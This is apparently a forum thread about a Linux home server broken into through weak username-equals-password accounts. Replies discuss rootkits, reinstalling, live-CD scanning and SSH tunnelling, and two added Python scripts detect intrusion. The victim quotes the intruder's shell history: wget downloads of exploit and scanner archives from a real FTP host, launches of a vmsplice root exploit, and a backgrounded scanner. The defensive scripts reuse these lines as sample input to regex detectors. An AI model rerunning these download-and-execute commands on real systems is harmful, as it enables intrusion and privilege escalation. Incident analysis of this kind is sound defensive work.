Hi!
I use icecast+mpd to stream music to my workplace. To get that stream I use DynDNS.
I also installed and configured sshd for remote control and vsftpd via xinetd. Nothing bad so far, I think.
The bad thing: I've set up some unprivileged users (username=password), very stupid I know,
to give some friends cheap and easy FTP access to store some stuff (presentations for university, e.g.).
And those users have SSH access too.
A few days ago, I noticed due to CPU usage that something's not right. I saw somebody logged into my machine, stopped sshd and
all other network related things. The user ran some scripts and I stopped them.
Mainly some bash scripts using pscan2 (maybe this: http://packetstormsecurity.org/UNIX/scanners/pscan2.c )
All files were in the user's home dir.
clamav, rkhunter and chkrootkit were only complaining about those files in the user's homedir. (linux.rst.b)
nmap tells me that no port is open when my services are down.
Now I am not sure if I am infected or if I was fast enough to stop that exploit(??),
nor do I know what I should do now.
Maybe someone can check my machine? I really don't want to set it up again and hope that's not the only chance to sleep well again.
Any advice? Searching the web tells me that those tools that were used are about 6 years old.
I can put all that into an archive and upload it to rapidshare or so, if wanted.
Sorry for my bad English.
Greetings, matto
// DAMNiAM //
By the sounds of it, you're probably root-kitted. Once you've been root-kitted, you can't really be 100% sure if it's been cleaned. Root kits are designed to hide themselves, by modifying things like ps and netstat etc.
Your safest option is to reinstall I'm afraid.
Are you familiar with our Forum Rules, and How To Ask Questions The Smart Way?
BlueHackers // fscanary // resticctl
Maybe you could fix things, but if I was in your place I would reinstall everything. At least just to sleep well again.
If you noticed that the pscan was running at 100% before you killed it, then you are probably OK. But like fukawi2 and ArchArael suggest, it's really hard to be sure.
I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?
archlinux - please read this and this — twice — then ask questions.
--
http://rsontech.net | http://github.com/rson
Hi
Thanks for your quick reply!
If I set up my machine again, can I keep my configuration files?
Are my private files .. infected or whatever with anything?
I set up my partitions as follows:
/dev/hdc2 on / type jfs (rw)
/dev/hdc5 on /var type jfs (rw)
/dev/hdc6 on /home type jfs (rw) // i can leave this unchanged, right?
/dev/hdc7 on /mnt/mukku type jfs (rw) // music
/dev/hdc8 on /mnt/zoix type jfs (rw) // backups, other stuff
A general question:
The attacker tries to get root using 2 exploits.
What if these exploits don't work? Was it possible for him to do any damage?
Can I check this using the same exploits?
Has anyone here ever tried or heard of those exploits?
Anything to think about before I try it?
Here is the relevant history part, till I stopped all connections:
75 ps x
76 w
77 uname -a
78 cat /proc/cpuinfo
79 passwd
80 ps x
81 passwd
82 id
83 ifconfg
84 ifconfig
85 cat /proc/cpuinfo
86 mkdir .cornd
87 wget ftp://89.39.167.131/k/expl2008.zip
88 unzip expl2008.zip
89 rm -rf expl2008.zip
90 ./diane_lane
91 ./jessica_biel
92 ls -l
93 cd .cornd
94 rm -rf *
95 ls la
96 w
97 uptime
98 cat /etc/issue
99 uname -a
100 ps -afx
101 wget ftp://89.39.167.131/k/vip.tgz
102 tar zxvf vip.tgz
103 rm -rf vip.tgz
104 cd vip
105 chmod +x *
106 nohup ./start 92 >> /dev/null &
107 rm -rf vuln.txt
108 ps -x
I still have all these files, but moved to another dir, done with the "hacked" user.
Greetings, matto
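The history above is the most useful artefact in this thread: it shows a download, unpack, execute, clean-up sequence that a defender can recognise mechanically. The following triage script is an added example (not matto's files or anything from the thread); it tags a constructed, shortened copy of those history lines with heuristic indicators and flags the dropper chain. The indicator names and regexes are my own choices, not a standard rule set.

```python
import re

# Constructed sample: a shortened copy of the attacker's shell history quoted
# in the thread above, without the history numbers. Sample input only.
SAMPLE_HISTORY = """\
uname -a
mkdir .cornd
wget ftp://89.39.167.131/k/expl2008.zip
unzip expl2008.zip
rm -rf expl2008.zip
./jessica_biel
cd .cornd
wget ftp://89.39.167.131/k/vip.tgz
tar zxvf vip.tgz
cd vip
chmod +x *
nohup ./start 92 >> /dev/null &
"""

# Stages of the download -> unpack -> execute -> clean-up pattern. Heuristics only.
INDICATORS = [
    ("recon",      re.compile(r"^(uname -a|cat /proc/cpuinfo|cat /etc/issue)")),
    ("hidden_dir", re.compile(r"^(mkdir|cd)\s+\.[\w.-]+")),
    ("download",   re.compile(r"^(wget|curl)\s+\S*://")),
    ("unpack",     re.compile(r"^(unzip\b|tar\s+\S*x)")),
    ("mark_exec",  re.compile(r"^chmod\s+\+x\b")),
    ("local_exec", re.compile(r"^(nohup\s+)?\./\S+")),
    ("cleanup",    re.compile(r"^rm\s+-rf?\b")),
]

def triage(history):
    """Return (line_no, tag, command) for each history line matching an indicator."""
    findings = []
    for no, line in enumerate(history.splitlines(), start=1):
        cmd = line.strip()
        for tag, pattern in INDICATORS:
            if pattern.search(cmd):
                findings.append((no, tag, cmd))
                break  # one tag per command is enough for triage
    return findings

def dropper_chain(findings, window=5):
    """True if a download is followed within `window` lines by both an unpack
    and a local execution: the sequence that got the scanner running here."""
    for start, tag, _ in findings:
        if tag != "download":
            continue
        later = {t for no, t, _ in findings if start < no <= start + window}
        if {"unpack", "local_exec"} <= later:
            return True
    return False

if __name__ == "__main__":
    for no, tag, cmd in triage(SAMPLE_HISTORY):
        print(f"{no:3d} {tag:<10} {cmd}")
```

Run it against `~/.bash_history` copied off the disk from a live environment, so the history itself is read before the suspect system can alter it.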
Hi again!
@rson451:
Good idea, I did that right now. I downloaded "grml", which looked pretty good to me.
Same results there.
I've just a last question. If there is any backdoor or IRC bot installed, will I see it listening with nmap?
Greetings, matto
> I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?
In theory yes, however it's still difficult to be 100% sure... IMHO, better safe than sorry...
> If I set up my machine again, can I keep my configuration files?
> Are my private files .. infected or whatever with anything?
In theory, they shouldn't be infected, but it's hard to say... I would back up your home partition, then selectively restore your documents / music / etc. and skip any .files or .folders in case something has been hidden in there. It's unlikely they hid anything in non-hidden folders, as they have no way of knowing which folders you access regularly, which would mean you would see strange files immediately.
> Here is the relevant history part, till I stopped all connections:
> <SNIP>
> I still have all these files, but moved to another dir, done with the "hacked" user.
That's interesting... I work in Network Security - would you mind tar'ing that up and sending to me? I'd love to have a closer look...
> I've just a last question. If there is any backdoor or IRC bot installed, will I see it listening with nmap?
If you're *SURE* your netstat hasn't been modified, then it will show... However, if the root kit has modified netstat, then it will deliberately hide it from you.
No, nmap will not show you a hidden backdoor in all cases when you do a scan. If one uses, for instance, port knocking, nmap won't show you any activity. In general, however, this is rather improbable.
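Both answers above turn on the same point: netstat and nmap can only report what they see, and a trojaned netstat binary will lie. One independent check, added here as an example and not part of the thread, is to parse the kernel's own socket table in /proc/net/tcp and compare the LISTEN rows with the ports netstat printed. The sample table is constructed (the sshd row on 22 and a made-up listener on 6667 owned by uid 1001); it catches a tampered userland binary, not a kernel-mode rootkit that filters /proc itself.

```python
import socket
import struct

# Constructed sample of /proc/net/tcp (IPv4 table). Row 1 is a listener on
# port 0x1A0B = 6667 owned by an unprivileged uid, made up for this example.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 00000000:1A0B 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 5678 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 9012 1 0000000000000000 20 4 30 10 -1
"""

LISTEN = "0A"  # socket state code used by the kernel in /proc/net/tcp

def decode_addr(hexaddr):
    """Turn '0100007F:0016' into ('127.0.0.1', 22). The kernel writes the
    IPv4 address as a little-endian 32-bit word, the port in network order."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def listening_sockets(proc_net_tcp):
    """(ip, port, uid, inode) for every LISTEN row, read straight from the
    kernel table rather than from the netstat binary."""
    rows = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header line
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN:
            continue
        ip, port = decode_addr(f[1])
        rows.append((ip, port, int(f[7]), int(f[9])))
    return rows

def hidden_listeners(proc_net_tcp, netstat_ports):
    """Ports the kernel says are listening but netstat did not report."""
    return sorted(port for _, port, _, _ in listening_sockets(proc_net_tcp)
                  if port not in netstat_ports)

if __name__ == "__main__":
    # On a live box: open("/proc/net/tcp").read() and the ports from `netstat -tln`.
    for ip, port, uid, inode in listening_sockets(SAMPLE_PROC_NET_TCP):
        print(f"LISTEN {ip}:{port} uid={uid} inode={inode}")
    print("not reported by netstat:", hidden_listeners(SAMPLE_PROC_NET_TCP, {22}))
```

The uid column is worth a look on its own: a listener owned by one of the weak-password accounts rather than root is exactly what an IRC bot started as that user would look like.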
> Here is the relevant history part, till I stopped all connections:
> 91 ./jessica_biel
jessica_biel is that kernel vmsplice exploit to get root powers that was found a couple of months back. That would have failed unless your system was very out of date.
You should google the other programs and see if you were vulnerable to any of them.
Edit: diane_lane is the same exploit as jessica_biel
I would do a complete reinstall.
I use the same basic setup as you outlined above, except the only ports open to the public are sshd (22) and http (80), with root login disabled. To access everything else I use SSH tunnels. I tunnel Icecast for music and Samba for file access over SSH. Since I'm using Windows, I use a modified PuTTY that stores everything on a flash drive and attempts to reconnect on disconnect; the minimize-to-tray feature is really nice as well.
I would not use FTP for anything. I know it can be made secure, but really SSHFS for Linux is a lot more secure and a lot easier to set up. For non-Linux users Samba is the way to go; for remote access I tunnel it over SSH, see http://www.blisstonia.com/eolson/notes/smboverssh.php. Also, for most things like x11vnc/vncservers, be sure they only accept connections from localhost (your SSH tunnel).
Edit: When I'm at work I also use portable Pidgin and portable Firefox to chat/browse the net. Check out dynamic port forwarding to tunnel all Firefox/Pidgin traffic through your home computer to avoid firewalls and the local sysadmins snooping on things.
Edit2: Here you can see my flash drive with all of my portable applications set up, and the modified PuTTY setup with different sessions saved.
Last edited by Ruckus (2008-11-25 00:17:02)